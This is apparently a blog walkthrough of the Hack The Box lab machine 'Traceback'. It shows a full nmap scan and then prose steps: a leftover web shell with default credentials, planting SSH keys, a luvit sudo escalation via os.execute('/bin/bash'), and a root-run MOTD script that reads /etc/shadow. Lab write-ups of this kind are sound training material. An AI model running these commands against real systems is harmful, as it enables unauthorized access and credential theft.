TRACEBACK WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 12:03 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 12:03
    Completed NSE at 12:03, 0.00s elapsed
    Initiating NSE at 12:03
    Completed NSE at 12:03, 0.00s elapsed
    Initiating NSE at 12:03
    Completed NSE at 12:03, 0.00s elapsed
    Initiating Ping Scan at 12:03
    Scanning 10.10.10.181 [4 ports]
    Completed Ping Scan at 12:03, 0.44s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:03
    Completed Parallel DNS resolution of 1 host. at 12:03, 0.57s elapsed
    Initiating SYN Stealth Scan at 12:03
    Scanning 10.10.10.181 [1000 ports]
    Discovered open port 22/tcp on 10.10.10.181
    Discovered open port 80/tcp on 10.10.10.181
    Completed SYN Stealth Scan at 12:03, 3.45s elapsed (1000 total ports)
    Initiating Service scan at 12:03
    Scanning 2 services on 10.10.10.181
    Completed Service scan at 12:03, 6.88s elapsed (2 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.181
    Retrying OS detection (try #2) against 10.10.10.181
    Retrying OS detection (try #3) against 10.10.10.181
    Retrying OS detection (try #4) against 10.10.10.181
    Retrying OS detection (try #5) against 10.10.10.181
    Initiating Traceroute at 12:03
    Completed Traceroute at 12:03, 0.66s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 12:03
    Completed Parallel DNS resolution of 2 hosts. at 12:03, 0.30s elapsed
    NSE: Script scanning 10.10.10.181.
    Initiating NSE at 12:03
    Completed NSE at 12:04, 8.03s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 1.43s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Nmap scan report for 10.10.10.181
    Host is up (0.25s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
    |   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
    |_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET POST OPTIONS HEAD
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Help us
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=5/30%OT=22%CT=1%CU=38618%PV=Y%DS=2%DC=T%G=Y%TM=5ED1FE5
    OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
    OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
    OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)

    Uptime guess: 0.580 days (since Fri May 29 22:08:32 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 5900/tcp)
    HOP RTT       ADDRESS
    1   659.58 ms 10.10.14.1
    2   659.59 ms 10.10.10.181

    NSE: Script Post-scanning.
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 37.69 seconds
            Raw packets sent: 1141 (54.230KB) | Rcvd: 1103 (47.658KB)

WEB ENUMERATION PORT 80

Lets First check Webpage !!

Lets check its source code

Here We see That we Have something written in comments So lets Google that !!

After Testing bunch of this I got one of them working Smevk.php lets redirect our url with this php file
credentials are default admin and admin we can read them in php file
After Logging in I got webpage like this!!

After looking at this page we can read and write files in actual machine So Lets use our own ssh keys and copy them to Webadmin as we cannot use Sysadmin
So after copying files in /home/webadmin/.ssh/authorized_keys we can SSH into webadmin.

SSH WEBADMIN THEN SYSADMIN

As we can see we have access to sysadmin

After trying to get into sysadmin I failed!!

Its time to priv escalate our user

sudo -l

After searching over google I saw that i can access sysadmin using simple commands <br>So I used simple command to check if it works

echo “os.execute(‘/bin/bash/’)” > privesc.lua

sudo -u sysadmin /home/sysadmin/luvit privesc.lua

Here We got Sysadmin’s User access!!!

GETTING ROOT ACCESS

Lets run pspy32 to check running proccess

we got a process which is unique!!

Lets google this !!

After google Lets see file permissions and users

root and sysadmin

It is updated every 30 seconds

Lets execute our command in 00-header as we can see output of this file in ssh login time as it is same as ssh login..

echo “cat /etc/shadow” > 00-header1

We have to login to webadmin SSH again in another terminal

Here we got our output!!

echo “cat /root/root.txt

Here we Go with our root flag!!

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: